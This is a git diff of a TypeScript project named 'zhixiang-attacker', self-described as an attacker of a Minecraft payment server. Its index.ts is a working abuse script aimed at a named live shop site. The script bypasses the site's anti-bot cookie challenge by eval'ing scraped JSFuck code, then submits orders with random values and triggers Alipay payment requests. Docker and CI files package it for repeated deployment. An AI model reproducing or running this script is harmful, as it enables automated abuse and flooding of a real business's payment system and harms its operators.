first

.dockerignore

+# compiled output
+/dist
+/node_modules
+
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+
+# OS
+.DS_Store
+
+# Tests
+/coverage
+/.nyc_output
+
+# IDEs and editors
+/.idea
+.project
+.classpath
+.c9/
+*.launch
+.settings/
+*.sublime-workspace
+
+# IDE - VSCode
+.vscode/*
+!.vscode/settings.json
+!.vscode/tasks.json
+!.vscode/launch.json
+!.vscode/extensions.json
+
+/data
+/output
+/config.yaml
+
+.git*
+Dockerfile
+.dockerignore

.eslintrc.js

+module.exports = {
+  parser: '@typescript-eslint/parser',
+  parserOptions: {
+    project: 'tsconfig.json',
+    sourceType: 'module',
+  },
+  plugins: ['@typescript-eslint/eslint-plugin'],
+  extends: [
+    'plugin:@typescript-eslint/recommended',
+    'plugin:prettier/recommended',
+  ],
+  root: true,
+  env: {
+    node: true,
+    jest: true,
+  },
+  ignorePatterns: ['.eslintrc.js'],
+  rules: {
+    '@typescript-eslint/interface-name-prefix': 'off',
+    '@typescript-eslint/explicit-function-return-type': 'off',
+    '@typescript-eslint/explicit-module-boundary-types': 'off',
+    '@typescript-eslint/no-explicit-any': 'off',
+  },
+};

.gitignore

+# compiled output
+/dist
+/node_modules
+
+# Logs
+logs
+*.log
+npm-debug.log*
+yarn-debug.log*
+yarn-error.log*
+lerna-debug.log*
+
+# OS
+.DS_Store
+
+# Tests
+/coverage
+/.nyc_output
+
+# IDEs and editors
+/.idea
+.project
+.classpath
+.c9/
+*.launch
+.settings/
+*.sublime-workspace
+
+# IDE - VSCode
+.vscode/*
+!.vscode/settings.json
+!.vscode/tasks.json
+!.vscode/launch.json
+!.vscode/extensions.json
+
+/data
+/output
+/config.yaml
\ No newline at end of file

.gitlab-ci.yml

+stages:
+  - build
+  - combine
+  - deploy
+variables:
+  GIT_DEPTH: "1"
+  CONTAINER_TEST_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG
+  CONTAINER_TEST_ARM_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-arm
+  CONTAINER_TEST_X86_IMAGE: $CI_REGISTRY_IMAGE:$CI_COMMIT_REF_SLUG-x86
+  CONTAINER_RELEASE_IMAGE: $CI_REGISTRY_IMAGE:latest
+before_script:
+  - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY
+build-x86:
+  stage: build
+  tags:
+    - docker
+  script:
+    - TARGET_IMAGE=$CONTAINER_TEST_X86_IMAGE
+    - docker build --pull -t $TARGET_IMAGE .
+    - docker push $TARGET_IMAGE
+build-arm:
+  stage: build
+  tags:
+    - docker-arm
+  script:
+    - TARGET_IMAGE=$CONTAINER_TEST_ARM_IMAGE
+    - docker build --pull -t $TARGET_IMAGE .
+    - docker push $TARGET_IMAGE
+combine:
+  stage: combine
+  tags:
+    - docker
+  script:
+    - TARGET_IMAGE=$CONTAINER_TEST_IMAGE
+    - SOURCE_IMAGE_2=$CONTAINER_TEST_ARM_IMAGE
+    - SOURCE_IMAGE_1=$CONTAINER_TEST_X86_IMAGE
+    - docker pull $SOURCE_IMAGE_1
+    - docker pull $SOURCE_IMAGE_2
+    - docker manifest create $TARGET_IMAGE --amend $SOURCE_IMAGE_1 --amend
+      $SOURCE_IMAGE_2
+    - docker manifest push $TARGET_IMAGE
+deploy_latest:
+  stage: deploy
+  tags:
+    - docker
+  script:
+    - TARGET_IMAGE=$CONTAINER_RELEASE_IMAGE
+    - SOURCE_IMAGE=$CONTAINER_TEST_IMAGE
+    - docker pull $SOURCE_IMAGE
+    - docker tag $SOURCE_IMAGE $TARGET_IMAGE
+    - docker push $TARGET_IMAGE
+  only:
+    - master
+deploy_tag:
+  stage: deploy
+  tags:
+    - docker
+  script:
+    - TARGET_IMAGE=$CI_REGISTRY_IMAGE:$CI_COMMIT_TAG
+    - SOURCE_IMAGE=$CONTAINER_TEST_IMAGE
+    - docker pull $SOURCE_IMAGE
+    - docker tag $SOURCE_IMAGE $TARGET_IMAGE
+    - docker push $TARGET_IMAGE
+  only:
+    - tags

.npmignore

+/install-npm.sh
+.git*
+/data
+/output
+/config.yaml
+.idea
+.dockerignore
+Dockerfile
\ No newline at end of file

.prettierrc

+{
+  "singleQuote": true,
+  "trailingComma": "all"
+}
\ No newline at end of file

Dockerfile

+FROM node:bullseye-slim
+LABEL Author="Nanahira <nanahira@momobako.com>"
+
+RUN apt update && apt -y install python3 build-essential && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
+WORKDIR /usr/src/app
+COPY ./package*.json ./
+RUN npm ci
+COPY . ./
+RUN npm run build
+
+CMD ["npm", "run", "start"]

index.ts

+import axios from 'axios';
+import cryptoRandomString from 'crypto-random-string';
+import qs from 'qs';
+import got from 'got';
+import https from 'https';
+import http2 from 'http2-wrapper';
+const agent = new https.Agent();
+const http2Agent = new http2.Agent();
+Object.assign(agent, http2Agent);
+
+function parseJsFuck(code: string): string {
+  return eval(`(${code})`);
+}
+
+async function attack() {
+  console.log('Requesting loading page.');
+  const loadingPageResponse = await got('https://paperboxshop.top/index.php', {
+    http2: true,
+    responseType: 'text',
+    headers: {
+      'User-Agent':
+        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
+    },
+  });
+  console.log(loadingPageResponse.httpVersion);
+  const jsFuckMatch = loadingPageResponse.body.match(
+    /setCookie\('sec_defend', ?\(([\[\]\(\)!\+\{\}]+)\)\);setCookie/,
+  );
+  if (!jsFuckMatch) {
+    console.error(`sec_defend not found.`);
+    return;
+  }
+  const sec_defend = parseJsFuck(jsFuckMatch[1]);
+  console.log(`sec_defend: ${sec_defend}`);
+  console.log('Requesting main page.');
+  const Cookie = `sec_defend=${sec_defend};`;
+  const mainPage = await got('https://paperboxshop.top/index.php', {
+    http2: true,
+    responseType: 'text',
+    headers: {
+      Cookie,
+      'User-Agent':
+        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
+    },
+  }).text();
+  const hashsaltMatch = mainPage.match(/var hashsalt=([\[\]\(\)!\+\{\}]+);/);
+  if (!hashsaltMatch) {
+    console.error(`hashsalt not found.`);
+    return;
+  }
+  const hashsalt = parseJsFuck(hashsaltMatch[1]);
+  console.log(`hashsalt: ${hashsalt}`);
+  console.log('Submitting payment.');
+  const payResult = await got
+    .post('https://paperboxshop.top/ajax.php?act=pay', {
+      responseType: 'json',
+      http2: true,
+      form: {
+        tid: 1,
+        inputvalue: cryptoRandomString({ length: 12, type: 'alphanumeric' }),
+        num: Math.ceil(Math.random() * 10000),
+        hashsalt,
+      },
+      headers: {
+        Cookie,
+        'User-Agent':
+          'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
+      },
+    })
+    .json<{
+      code: number;
+      msg: string;
+      trade_no: string;
+    }>();
+  if (payResult.code) {
+    console.error(`Payment failed: ${payResult.code} ${payResult.msg}`);
+    return;
+  }
+  await got(`https://paperboxshop.top/other/submit.php`, {
+    responseType: 'text',
+    http2: true,
+    searchParams: {
+      type: 'alipay',
+      orderid: payResult.trade_no,
+    },
+    headers: {
+      Cookie,
+      'User-Agent':
+        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
+    },
+  });
+  console.log(`Success: ${JSON.stringify(payResult)}`);
+}
+attack();

install-npm.sh

+#!/bin/bash
+
+npm install --save-dev \
+	@types/node \
+	typescript \
+	'@typescript-eslint/eslint-plugin@^4.28.2' \
+	'@typescript-eslint/parser@^4.28.2 '\
+	'eslint@^7.30.0' \
+	'eslint-config-prettier@^8.3.0' \
+	'eslint-plugin-prettier@^3.4.0' \
+	prettier

package.json

+{
+  "name": "zhixiang-attacker",
+  "version": "1.0.0",
+  "description": "Attacker of zhixiang minecraft payment server",
+  "main": "dist/index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git@git.mycard.moe:nanahira/zhixiang-attacker.git"
+  },
+  "author": "",
+  "license": "ISC",
+  "devDependencies": {
+    "@types/node": "^16.11.6",
+    "@types/qs": "^6.9.7",
+    "@typescript-eslint/eslint-plugin": "^4.33.0",
+    "@typescript-eslint/parser": "^4.33.0",
+    "eslint": "^7.32.0",
+    "eslint-config-prettier": "^8.3.0",
+    "eslint-plugin-prettier": "^3.4.1",
+    "prettier": "^2.4.1",
+    "typescript": "^4.4.4"
+  },
+  "dependencies": {
+    "axios": "^0.24.0",
+    "crypto-random-string": "^3.3.1",
+    "got": "^11.8.2",
+    "http2-wrapper": "^2.1.9",
+    "qs": "^6.10.1"
+  }
+}

tsconfig.json

+{
+	"compilerOptions": {
+		"outDir": "dist",
+		"module": "commonjs",
+		"target": "es2021",
+		"esModuleInterop": true,
+		"emitDecoratorMetadata": true,
+		"experimentalDecorators": true,
+		"declaration": true,
+		"sourceMap": true
+	},
+	"compileOnSave": true,
+	"allowJs": true,
+	"include": [
+		"*.ts",
+		"src/**/*.ts",
+		"test/**/*.ts"
+	]
+}